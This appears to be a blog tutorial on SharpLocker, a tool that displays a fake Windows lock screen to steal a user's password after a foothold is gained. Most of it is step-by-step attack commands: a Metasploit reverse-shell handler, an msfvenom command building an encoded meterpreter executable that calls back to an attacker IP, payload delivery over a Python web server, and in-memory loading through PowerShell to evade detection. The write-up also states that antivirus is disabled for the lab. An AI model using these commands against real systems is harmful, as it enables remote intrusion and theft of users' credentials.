SharpLocker

SharpLocker is a tool that helps hackers steal Windows credentials by popping up a fake Windows lock screen. All of the output is sent to the console which is works well with Cobalt Strike or Metasploit. This is a tool that can be injected into memory to avoid detection.

How to use SharpLocker with Metasploit

Suppose you have a foothold on a Windows machine that you are hacking and you want to attempt snagging the users credentials.

Assuming you have a meterpreter session running you can easily upload the SharpLocker.exe and execute the application.

Note: running the .exe is not the intended way of using SharpLocker. It’s supposed to be injected into memory and never touch disk, but this method does work. This could get detected by heuristic analysis. See the lab below for more details.

# meterpreter session
upload SharpLocker.exe
shell
SharpLocker.exe

At this point a screen should pop up that looks identical to a user logon screen.

(SharpLocker Login Screen)

When the user enters there password it will be put into the meterpreter session for you to use.

Let’s Look at the Source Code

To clone the GitHub repository you can run this command.

git clone https://github.com/Pickfordmatt/SharpLocker

SharpLocker’s GitHub Repository

https://github.com/Pickfordmatt/SharpLocker

Full Walkthrough & Lab Setup

In this lab, I’m going to do this in a Windows environment using a Docker image of Parrot OS and run a Windows 10 Enterprise victim machine in Hyper-V. I wasn’t able to get this to work in Windows Sandbox (wouldn’t return password) so I decided to use a Hyper-V image.

I’ll also do things slightly differently than in the initial demo.

Attack Machine Firewall

Make sure you have ports 4444 and port 8080 open for traffic.

Windows 10 Enterprise Setup

Trial Windows 10 Enterprise Hyper-V
https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/

You will need to create a user or change the password of the default user in Windows 10.

For this demo, we will also disable the Anti Virus in the VM. Microsoft Security Essentials is quick to pick up meterpreter payloads. There are ways around this but that’s not what this tutorial is about. Focus!

Default Windows 10 Enterprise password is: “Passw0rd!”

Metasploit Listener in Parrot OS (Docker)

Being that I am a .NET developer, who loves Docker, I want to demonstrate this on Windows using a Docker image of Parrot OS.

# create a parrotos/work dir if you don't already have one...
mkdir -p parrotos/work
cd parrotos

# go into work folder
cd work

# start parrotos from docker
docker run --rm -it -v $PWD/work:/work -p 4444:4444 parrotsec/security

Let me explain what some of these docker commands do.
–rm – removes the docker container when it’s exited.
-it – we’ll get an interactive terminal to the container
-v – a bind mount to map in our local parrotos/work folder to the container’s work folder on the root system.
-p 4444:4444 – maps host port 4444 to the containers port 4444.
-p 8080:8080 – maps host port 8080to the containers port 8080.

Start Metasploit Multi Handler to Catch the Shell

# start msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.12
set LPORT 4444
run

Msfvenom Meterpreter Exploit

You’ll need to get your local IP address to your local lan for this demonstration.

# get local lan ip
ipconfig

# start parrotos from docker (2nd tab for msvenom)
docker run --rm -it -v $PWD/work:/work -p 8080:8080 parrotsec/security

# go into work folder
cd work

# generate meterpreter exploit
msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp LHOST=192.168.0.12 LPORT=4444 -e x86/shikata_ga_nai -f exe > msf.exe

For the sake of this demonstration, we’re just going to drop the meterpreter exploit onto the machine and run it so that we can get a hook back to our multi-handler.

I’m going to use the python3 built in webserver to drop the msf.exe. Make sure you are in the work folder.

# run python web server
python3 -m http.server 8080

Stealing Creds with SharpLocker

In order to use SharpLocker with PowerShell, we’re going to need to make the class public. Well, this is the easy way, there are other ways.

Program.cs

Change “static class Program” to “public static class Program”.. and also change “static void Main()” to “public static void Main()”.

namespace SharpLocker
{
    public static class Program
    {
        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        public static void Main()
        {
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);
            Application.Run(new LockScreenForm());
        }
    }
}

Then recompile…

At this point, we should have a Metasploit session started. We’ll assume this is a hypothetical situation where we’ve established a foothold on a machine. Now, we can upload SharpLocker.exe and run it in the memory of PowerShell.

# using first tab with multi handler
meterpreter> shell

upload SharpLocker.exe

# get current directory
pwd
# returns - C:\Users\User\Downloads

# load PowerShell extension
load powershell
powershell_execute [Reflection.Assembly]::LoadFile("C:\Users\User\Downloads\SharpLocker.exe")
powershell_execute [SharpLocker.Program]::Main()

I checked it in the Task Manager by hitting CTRL + ALT + DELETE.

As always! Like, Follow Subscribe!

Facebook Page
YouTube Channel

LEAVE A REPLY

Please enter your comment!
Please enter your name here